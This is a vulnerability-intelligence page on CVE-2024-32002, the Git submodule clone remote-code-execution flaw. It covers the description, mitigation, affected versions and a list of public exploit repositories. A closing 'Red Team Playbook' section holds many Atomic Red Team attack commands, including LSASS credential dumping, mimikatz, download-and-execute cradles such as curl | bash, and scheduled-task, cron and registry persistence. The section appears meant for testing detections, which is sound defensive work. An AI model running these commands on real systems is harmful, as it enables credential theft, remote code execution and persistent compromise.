CVE-2024-32002
Overview
This vulnerability is a directory traversal and arbitrary file write flaw in Git's handling of submodules during clone operations. The root cause lies in Git incorrectly resolving paths, allowing crafted repositories to write files outside the intended submodule worktree into the parent repository’s .git directory. The affected component is Git's submodule cloning mechanism, specifically related to symbolic link handling and path resolution.
Vulnerability Description
Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
Impact
An unauthenticated attacker can execute arbitrary code on the victim's system during a Git clone operation by injecting malicious hooks into the .git directory. This occurs without user interaction beyond cloning a malicious repository, exploiting the recursive submodule feature with symbolic links enabled. The attacker gains full control over the clone process, potentially compromising the host system, as indicated by the CVSS vector (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) which highlights network attack vector with high privileges and complete confidentiality, integrity, and availability impact.
Solution
Users should upgrade Git to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, or 2.39.4 or later, as these contain patches addressing this vulnerability. Alternatively, disabling symbolic link support globally using 'git config --global core.symlinks false' mitigates the issue. Detailed patch and mitigation instructions are available in the official Git security advisory at https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the revision control system Git arises from a flaw in how repositories with submodules are handled. Specifically, the issue allows an attacker to manipulate the cloning process such that files can be written directly into the `.git/` directory instead of the intended submodule's worktree. This exploitation occurs during the clone operation, where a malicious repository can contain a crafted submodule that executes a hook script. Since this execution takes place while the clone is still in progress, the user is left with no opportunity to review or inspect the code being executed. This flaw is particularly concerning as it bypasses typical security measures that would normally allow users to scrutinize scripts before they are run.
Attack vectors for this vulnerability primarily involve social engineering tactics, where an attacker may trick a user into cloning a malicious repository. Once the repository is cloned, the crafted submodule can execute arbitrary code, potentially leading to unauthorized access, data exfiltration, or system compromise. The risk is exacerbated in environments where users frequently clone repositories from various sources, including those that may not be fully trusted. Moreover, if the user has not disabled symbolic link support in Git, the attack becomes even more feasible, as it allows for the execution of malicious scripts without any prior warning.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Git for version control and collaboration. If exploited, it could lead to severe business risks, including data breaches, loss of intellectual property, and damage to reputation. For instance, if an attacker successfully executes a malicious hook, they could manipulate codebases, insert backdoors, or steal sensitive information. The financial implications of such incidents can be substantial, encompassing not only immediate remediation costs but also potential legal liabilities and loss of customer trust.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to the patched versions of Git is essential to close the security gap. Additionally, organizations should enforce policies that restrict cloning from untrusted sources and educate users on the risks associated with such actions. Monitoring for unusual activity during clone operations can also help identify potential exploitation attempts. Furthermore, disabling symbolic link support in Git can serve as a preventive measure, reducing the attack surface. Regular security training and awareness programs can empower users to recognize and avoid potential threats, thereby enhancing the overall security posture.
In conclusion, the vulnerability in Git related to submodule handling presents a serious threat to users and organizations alike. Its potential for exploitation through social engineering and the execution of arbitrary code during clone operations underscores the need for vigilance and proactive security measures. By adopting robust detection and mitigation strategies, organizations can safeguard their development environments and protect against the risks associated with this vulnerability.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Git | Git | All |
cpe:2.3:a:git:git:*:*:*:*:*:*:*:*
|
|
|
Git | Git | All |
cpe:2.3:a:git:git:*:*:*:*:*:*:*:*
|
|
|
Git | Git | All |
cpe:2.3:a:git:git:*:*:*:*:*:*:*:*
|
|
|
Git | Git | All |
cpe:2.3:a:git:git:*:*:*:*:*:*:*:*
|
|
|
Git | Git | 2.41.0 |
cpe:2.3:a:git:git:2.41.0:*:*:*:*:*:*:*
|
|
|
Git | Git | 2.44.0 |
cpe:2.3:a:git:git:2.44.0:*:*:*:*:*:*:*
|
|
|
Git | Git | 2.45.0 |
cpe:2.3:a:git:git:2.45.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (75)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
amalmurali47/git_rce
Exploit PoC for CVE-2024-32002
|
amalmurali47 | 533 | 150 | 2024-05-17 | View |
|
safebuffer/CVE-2024-32002
CVE-2024-32002 RCE PoC
|
safebuffer | 109 | 27 | 2024-05-18 | View |
|
amalmurali47/hook
Hook for the PoC for exploiting CVE-2024-32002
|
amalmurali47 | 18 | 33 | 2024-05-17 | View |
|
M507/CVE-2024-32002
local poc for CVE-2024-32002
|
M507 | 10 | 1 | 2024-05-18 | View |
|
YukaFake/CVE-2024-32002-Reverse-Shell
Este script demuestra cómo explotar la vulnerabilidad CVE-2024-32002 para obtener una reverse shell, proporcionando acce...
|
YukaFake | 6 | 0 | 2024-05-21 | View |
|
jakob-pennington/cve-2024-32002-poc-rce
|
jakob-pennington | 1 | 4 | 2024-05-18 | View |
|
jweny/CVE-2024-32002_EXP
|
jweny | 3 | 2 | 2024-05-20 | View |
|
NishanthAnand21/CVE-2024-32002-PoC
PoC of CVE-2024-32002 - Remote Code Execution while cloning special-crafted local repositories
|
NishanthAnand21 | 3 | 2 | 2024-07-30 | View |
|
jweny/CVE-2024-32002_HOOK
|
jweny | 3 | 2 | 2024-05-20 | View |
|
JakobTheDev/cve-2024-32002-poc-rce
|
JakobTheDev | 1 | 4 | 2024-05-18 | View |
|
10cks/hook
CVE-2024-32002-hook
|
10cks | 1 | 3 | 2024-05-20 | View |
|
markuta/CVE-2024-32002
A proof of concept for the git vulnerability CVE-2024-32002
|
markuta | 2 | 1 | 2024-05-17 | View |
|
10cks/CVE-2024-32002-EXP
|
10cks | 2 | 0 | 2024-05-23 | View |
|
bfengj/CVE-2024-32002-Exploit
|
bfengj | 2 | 0 | 2024-05-22 | View |
|
BasyacatX/CVE-2024-32002-PoC_Chinese
none
|
BasyacatX | 2 | 0 | 2024-06-01 | View |
|
BohemianHacks/CVE-2024-32002-poc
CVE-2024-32002 是 Git 中的一个严重漏洞,允许攻击者在用户执行 git clone 操作时远程执行任意代码(RCE)。
|
BohemianHacks | 1 | 1 | 2024-11-23 | View |
|
jakob-pennington/cve-2024-32002-submodule-rce
|
jakob-pennington | 0 | 1 | 2024-05-18 | View |
|
JakobTheDev/cve-2024-32002-submodule-rce
|
JakobTheDev | 0 | 1 | 2024-05-18 | View |
|
Goplush/CVE-2024-32002-git-rce
|
Goplush | 1 | 0 | 2024-05-28 | View |
|
th4s1s/CVE-2024-32002-PoC
Proof of Concept for CVE-2024-32002
|
th4s1s | 1 | 0 | 2024-09-27 | View |
|
grecosamuel/CVE-2024-32002
|
grecosamuel | 1 | 0 | 2024-10-22 | View |
|
fadhilthomas/poc-cve-2024-32002
poc of git rce using cve-2024-32002
|
fadhilthomas | 1 | 0 | 2024-05-23 | View |
|
CrackerCat/CVE-2024-32002_EXP
|
CrackerCat | 1 | 0 | 2024-05-20 | View |
|
YukaFake/CVE-2024-32002
This is the main repository for CVE 2024-32002, and requires recursive cloning because it contains the submodels necessa...
|
YukaFake | 0 | 1 | 2024-05-22 | View |
|
markuta/hooky
A submodule for exploiting CVE-2024-32002 vulnerability.
|
markuta | 0 | 1 | 2024-05-17 | View |
|
jakob-pennington/cve-2024-32002-poc-aw
A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.
|
jakob-pennington | 0 | 0 | 2024-05-25 | View |
|
jakob-pennington/cve-2024-32002-submodule-aw
A submodule to demonstrate CVE-2024-32002. Demonstrates arbitrary write into .git.
|
jakob-pennington | 0 | 0 | 2024-05-25 | View |
|
JakobTheDev/cve-2024-32002-poc-aw
A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.
|
JakobTheDev | 0 | 0 | 2024-05-25 | View |
|
10cks/CVE-2024-32002-POC
|
10cks | 0 | 0 | 2024-05-19 | View |
|
10cks/CVE-2024-32002-linux-hulk
|
10cks | 0 | 0 | 2024-05-19 | View |
|
10cks/CVE-2024-32002-linux-submod
|
10cks | 0 | 0 | 2024-05-19 | View |
|
aitorcastel/poc_CVE-2024-32002_submodule
|
aitorcastel | 0 | 0 | 2024-05-19 | View |
|
bfengj/CVE-2024-32002-hook
|
bfengj | 0 | 0 | 2024-05-22 | View |
|
vincepsh/CVE-2024-32002-hook
CVE-2024-32002-hook
|
vincepsh | 0 | 0 | 2024-05-22 | View |
|
WOOOOONG/hook
PoC Exploit for CVE-2024-32002
|
WOOOOONG | 0 | 0 | 2024-05-23 | View |
|
431m/rcetest
CVE-2024-32002 poc test
|
431m | 0 | 0 | 2024-05-30 | View |
|
charlesgargasson/CVE-2024-32002
GIT RCE CVE-2024-32002
|
charlesgargasson | 0 | 0 | 2024-07-29 | View |
|
Masamuneee/CVE-2024-32002-POC
This is a demo for CVE-2024-32002 POC
|
Masamuneee | 0 | 0 | 2024-09-27 | View |
|
ashutosh0408/CVE-2024-32002
This repository contains a PoC for exploiting CVE-2024-32002, a vulnerability in Git that allows RCE during a git clone ...
|
ashutosh0408 | 0 | 0 | 2025-03-06 | View |
|
srakkk/cve-2024-32002-demo
|
srakkk | 0 | 0 | 2025-10-23 | View |
|
ControlO8/CVE-2024-32002
CVE-2024-32002 Private for Capstone Project CC10
|
ControlO8 | 0 | 0 | 2026-03-12 | View |
|
ControlO8/CVE-2024-32002-hook
hook repo for cve-2024-32002
|
ControlO8 | 0 | 0 | 2026-03-12 | View |
|
Roronoawjd/git_rce
CVE-2024-32002 POC
|
Roronoawjd | 0 | 0 | 2024-05-21 | View |
|
1mxml/CVE-2024-32002-poc
|
1mxml | 0 | 0 | 2024-05-22 | View |
|
fadhilthomas/hook
part of poc cve-2024-32002
|
fadhilthomas | 0 | 0 | 2024-05-24 | View |
|
TSY244/CVE-2024-32002-git-rce
|
TSY244 | 0 | 0 | 2024-07-20 | View |
|
DayDayDayDreaming/backup-exec-hook
Submodule repo for Backup Exec CVE-2024-32002 exploit
|
DayDayDayDreaming | 0 | 0 | 2026-01-31 | View |
|
WOOOOONG/CVE-2024-32002
PoC Exploit for CVE-2024-32002
|
WOOOOONG | 0 | 0 | 2024-05-23 | View |
|
10cks/CVE-2024-32002-hulk
|
10cks | 0 | 0 | 2024-05-19 | View |
|
10cks/CVE-2024-32002-submod
|
10cks | 0 | 0 | 2024-05-19 | View |
|
10cks/CVE-2024-32002-smash
|
10cks | 0 | 0 | 2024-05-19 | View |
|
10cks/CVE-2024-32002-linux-smash
|
10cks | 0 | 0 | 2024-05-19 | View |
|
aitorcastel/poc_CVE-2024-32002
|
aitorcastel | 0 | 0 | 2024-05-19 | View |
|
blackninja23/CVE-2024-32002
|
blackninja23 | 0 | 0 | 2024-07-27 | View |
|
jolibb55/donald
An example of a repo that would make use of the CVE-2024-32002
|
jolibb55 | 0 | 0 | 2024-12-11 | View |
|
AD-Appledog/CVE-2024-32002
CVE-2024-32002wakuwaku
|
AD-Appledog | 0 | 0 | 2024-05-31 | View |
|
AD-Appledog/wakuwaku
cve-2024-32002yahhh
|
AD-Appledog | 0 | 0 | 2024-05-31 | View |
|
TSY244/CVE-2024-32002-git-rce-father-poc
|
TSY244 | 0 | 0 | 2024-07-20 | View |
|
JoaoLeonello/cve-2024-32002-poc
Proof of Concept for CVE-2024-32002: Git submodule path injection vulnerability.
|
JoaoLeonello | 0 | 0 | 2025-09-24 | View |
|
srakkk/cve-2024-32002-hook
|
srakkk | 0 | 0 | 2025-10-23 | View |
|
vincepsh/CVE-2024-32002
Repo for testing CVE-2024-32002
|
vincepsh | 0 | 0 | 2024-05-22 | View |
|
daemon-reconfig/CVE-2024-32002
A Reverse shell generator for gitlab-shell vulnerability cve 2024-32002
|
daemon-reconfig | 0 | 0 | 2024-07-28 | View |
|
chrisWalker11/running-CVE-2024-32002-locally-for-tesing
adapting CVE-2024-32002 for running offline and locally
|
chrisWalker11 | 0 | 0 | 2024-08-02 | View |
|
sanan2004/CVE-2024-32002
POC
|
sanan2004 | 0 | 0 | 2024-08-17 | View |
|
DayDayDayDreaming/backup-exec-cve-32002
Superproject repo for Backup Exec CVE-2024-32002 exploit
|
DayDayDayDreaming | 0 | 0 | 2026-01-31 | View |
|
Roronoawjd/hook
CVE-2024-32002 hook POC
|
Roronoawjd | 0 | 0 | 2024-05-21 | View |
|
tobelight/cve_2024_32002
https://www.cve.org/CVERecord?id=CVE-2024-32002
|
tobelight | 0 | 0 | 2024-06-01 | View |
|
sysonlai/CVE-2024-32002-hook
|
sysonlai | 0 | 0 | 2024-07-07 | View |
|
FlojBoj/CVE-2024-32002
|
FlojBoj | 0 | 0 | 2024-07-30 | View |
|
SpycioKon/CVE-2024-32002
Just small script to exploit CVE-2024-32002
|
SpycioKon | 0 | 0 | 2024-07-30 | View |
|
Masamuneee/hook
This is a demo for CVE-2024-32002 POC
|
Masamuneee | 0 | 0 | 2024-09-27 | View |
|
ashutosh0408/Cve-2024-32002-poc
This repository contains a PoC for exploiting CVE-2024-32002, a vulnerability in Git that allows RCE during a git clone ...
|
ashutosh0408 | 0 | 0 | 2025-03-06 | View |
|
Julian-gmz/hook_CVE-2024-32002
hihihihaa
|
Julian-gmz | 0 | 0 | 2024-10-08 | View |
|
Dre4m017/fuzzy
cve-2024-32002
|
Dre4m017 | 0 | 0 | 2025-07-22 | View |
|
JakobTheDev/cve-2024-32002-submodule-aw
A submodule to demonstrate CVE-2024-32002. Demonstrates arbitrary write into .git.
|
JakobTheDev | 0 | 0 | 2024-05-25 | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Generic
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (11)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
123 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
